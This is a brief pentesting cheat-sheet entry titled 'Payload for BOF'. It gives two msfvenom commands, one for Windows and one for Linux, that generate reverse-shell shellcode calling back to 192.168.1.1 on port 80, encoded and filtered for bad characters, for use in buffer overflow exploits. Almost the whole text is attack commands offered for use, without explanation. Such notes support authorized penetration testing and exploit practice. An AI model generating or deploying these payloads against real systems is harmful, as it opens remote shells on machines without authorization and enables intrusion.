Payload for BOF

The payload to be included in the exploit can be generated using msfvenom with the parameters mentioned in the following sample code,

Windows

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

Linux

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.1 LPORT=80 -b "\x00\x20" -f py -v shellcode

Last updated